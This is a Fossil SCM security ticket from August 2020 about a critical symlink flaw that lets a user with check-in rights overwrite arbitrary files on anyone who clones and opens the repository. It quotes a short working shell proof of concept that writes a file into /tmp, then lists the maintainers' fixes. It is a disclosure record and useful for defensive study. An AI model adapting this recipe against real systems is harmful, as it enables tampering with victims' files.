Fossil

View Ticket
Login
Home Timeline Docs Branches Tickets Wiki DownloadMore...
Edit New Ticket Plaintext
2020-08-19
00:18 Fixed ticket [f9831fdef1]: Arbitrary file overwrite using symlinks plus 4 other changes artifact: d80591cb72 user: drh
2020-08-18
12:17
When writing files to disk for a check-out, refuse to write through a symbolic link to a directory. Ticket [f9831fdef1d4edcc]. check-in: a64e384f0c user: drh tags: sec2020
2020-08-17
19:03 Ticket [f9831fdef1] Arbitrary file overwrite using symlinks status still Open with 5 other changes artifact: efa1c51ead user: drh
17:34
The allow-symlinks setting is no longer versionable and is off by default. The allow-symlinks setting no longer propagates with a clone. The help text for allow-symlinks discourages its use. There is a new --symlink flag on "fossil open" to permit the use of symlinks on an open, for the adventurous. Ticket [f9831fdef1d4edcc]. check-in: ff98dd5af6 user: drh tags: sec2020
08:39 New ticket [f9831fdef1] Arbitrary file overwrite using symlinks. artifact: c95172ddcb user: drh
Ticket Hash: f9831fdef1d4edccd10e4e416062820b63a15ee4
Title: Arbitrary file overwrite using symlinks
Status: Fixed Type: Code_Defect
Severity: Critical Priority: Immediate
Subsystem: Resolution: Fixed
Last Modified: 2020-08-19 00:18:49
5.62 years ago 		Created: 2020-08-17 08:39:03
5.62 years ago
Version Found In:
User Comments:
drh added on 2020-08-17 08:39:03:

A malicious user with check-in privileges can overwrite arbitrary files on a victim's system by exploiting weaknesses in the symlink mechanism of Fossil. Max Justicz provides the following demo:

fossil init oops.fossil
mkdir checkout
cd checkout
fossil open ../oops.fossil

ln -s /tmp/ link
fossil add link
fossil commit -m "add link"

echo "oops" > link/foo.txt
fossil add link/foo.txt
fossil commit -m "add foo"

# Remove the file so we can show the exploit works
rm /tmp/foo.txt

cd ..
fossil serve oops.fossil

# In another terminal
fossil clone http://localhost:8080/oops.fossil oops2.fossil
mkdir checkout2
cd checkout2
fossil open ../oops2.fossil

# /tmp/foo.txt was created!
cat /tmp/foo.txt
drh added on 2020-08-17 19:03:53:

Mitigations from check-in ff98dd5af61aef30ca4:

  • The allow-symlinks setting is off by default. Users must explicitly enable symlink support in order for Fossil to create symlinks.

  • The allow-symlinks setting is no longer a versioned setting. It must be set manually by the developer who wants to use it.

  • The allow-symlinks setting no longer propagates via clone. The setting continues to be off by default for clones even if it is on in the server.

drh added on 2020-08-19 00:18:49:

Additional defenses:

  • When checking out files, do not write files that are beneath a symlink in the check-out.

  • When doing a "fossil add" ignore files that are beneath a symlink.

This page was generated in about 0.014s by Fossil 2.26 [1205ec86cb] 2025-04-30 16:57:32